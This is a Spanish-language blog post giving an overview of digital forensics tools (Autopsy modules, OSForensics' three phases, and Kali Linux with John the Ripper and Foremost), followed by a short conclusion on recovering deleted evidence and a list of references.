Opciones de búsqueda avanzadas.
Registry viewer.
Análisis de correo electrónico y de archivos Zip.
Diseño de capa de base de datos.
Montaje seguro de dispositivos remotos.
Autopsy: Es una herramienta de análisis forense digital que permite ampliar la investigación de lo ocurrido en el equipo. Por lo que es rápida y ejecuta varias tareas en un segundo plano, generando un aprovechamiento de los núcleos del procesador del equipo, y así tener resultados lo más antes posible. Estos análisis requieren de horas para analizar el disco duro, pero en minutos se sabrá si la información no se encuentra, lo que permite que la palabra clave en la carpeta sea del usuario.
Recent Activity: extrae la actividad del usuario como lo último guardado por los navegadores web y el sistema operativo incluso en el registro de Windows.
Hash Lookup: utiliza bases de datos hash para ignorar archivos conocidos del NIST NSRL, se puede utilizar la opción Avanzada para agregar y configurar las bases de datos de hash para usar durante este proceso.
Keyword Search: La búsqueda por palabras clave utiliza listas de palabras clave para identificar archivos con palabras específicas. Puede seleccionar las listas de palabras clave para buscar de forma automática y además podremos crear nuevas listas utilizando el botón "Opciones avanzadas".
Archive Extractor: abre ZIP, RAR, y otros formatos de archivo y envía los archivos para su análisis.
Exif Image Parser: extrae la información EXIF de archivos JPEG y expone los resultados en la interfaz de usuario principal.
Thunderbird Parser: Identifica Thunderbird MBOX y extrae los correos electrónicos de ellos.
El programa autopsy corre en diversos sistemas operativos como Linux, Unix y hasta en el sistema operativo Microsoft.
OsForensics: es una pieza clave en investigaciones forenses digitales (digital forensics, como se conoce en inglés), un todo en uno que permite localizar pistas, mirar en el interior de archivos y sus cabeceras y, finalmente, organizar e indexar todos los datos hallados para un tratamiento posterior y su presentación.
Funcionamiento
OsForensics trabaja la información en 3 fases.
1. Descubrimiento
La herramienta realiza búsquedas de gran rapidez en toda la superficie del disco o dispositivo elegido, creando además un índice de información. Es capaz de extraer contraseñas, descifrar archivos y recuperar elementos borrados de diferentes sistemas de archivos: Windows, Mac y Linux.
2. Identificación
Las evidencias y actividades halladas son comparadas mediante su valor hash contra una base de datos. Además, se analizan todos los archivos y permite crear una línea de tiempo (timeline) de toda la actividad del usuario, para presentarla en orden cronológico.
3. Administración
Finalmente, la suite nos permite organizar todas nuestras evidencias en un guion ordenado, incorporando los datos del examinador forense, presentando los hechos acontecidos y adjuntando datos de otras herramientas forenses si es necesario.
SO Kali Linux: es una distribución basada en Debian GNU/Linux diseñada principalmente para la auditoría y seguridad informática en general. Fue fundada y es mantenida por Offensive Security Ltd. Mati Aharoni y Devon Kearns, ambos pertenecientes al equipo de Offensive Security, desarrollaron la distribución a partir de la reescritura de BackTrack, que se podría denominar como la antecesora de Kali Linux.
Kali Linux trae preinstalados más de 600 programas incluyendo Nmap (un escáner de puertos), Wireshark (un sniffer), John the Ripper (un crackeador de passwords) y la suite Aircrack-ng (software para pruebas de seguridad en redes inalámbricas). Kali puede ser usado desde un Live CD, live-usb y también puede ser instalada como sistema operativo principal.
Los programas que se utilizaron de esta distribución fueron John the Ripper para obtener la contraseña del equipo cuando este se encontraba encendido y Foremost para recuperar archivos eliminados de algún dispositivo como memorias USB o discos duros.
VÍDEO TUTORIAL
CONCLUSION
La informática forense se ha venido fortaleciendo a nivel global continuamente debido a que existen deviseros métodos que son implementados por los cibercrimales para lograr sus cometidos, en el caso de las personas que no utilizan los equipos informáticos para este tipo de fin, pero si para llevar un control de sus actividades delictivas, se han ido percatando de toda la información que estos equipos emitían u ofrecen a las autoridades policiales generando de que estos eliminen información como archivos descargados, historial de navegación entre otros, sin embargo gracias al continuo mejoramiento u avance de las distintas herramientas informáticas se puede llegar a recuperar hasta el 100% de la información que fue eliminado por el delincuente como el registro de eventos de Windows entre otros, datos que serán de alta importancia para la sociedad en especial para la institución que logro obtener las evidencias anteriores y de esta manera poder determinar el juicio del o los delincuentes.
REFERENCIAS
Disponible en: https://repository.unimilitar.edu.co/bitstream/handle/10654/14395/SuarezUrrutiaJenniferCatherine2016.pdf;jsessionid=14DC7F95C2F83C3C249DCF71A55A3ADC?sequence=1 tomado el 28/11/18.
Disponible en https://stadium.unad.edu.co/preview/UNAD.php?url=/bitstream/10596/17370/1/86078250.pdf tomado el 26/11/18
Disponible en https://www.osforensics.com/ tomado el 26/11/18
Disponle en https://aprendizdesysadmin.com/analisis-forense-de-los-registros-de-eventos-en-windows/ tomado el 26/11/18
20:35
By
aureliohacking.blogspot.com
0 comentarios: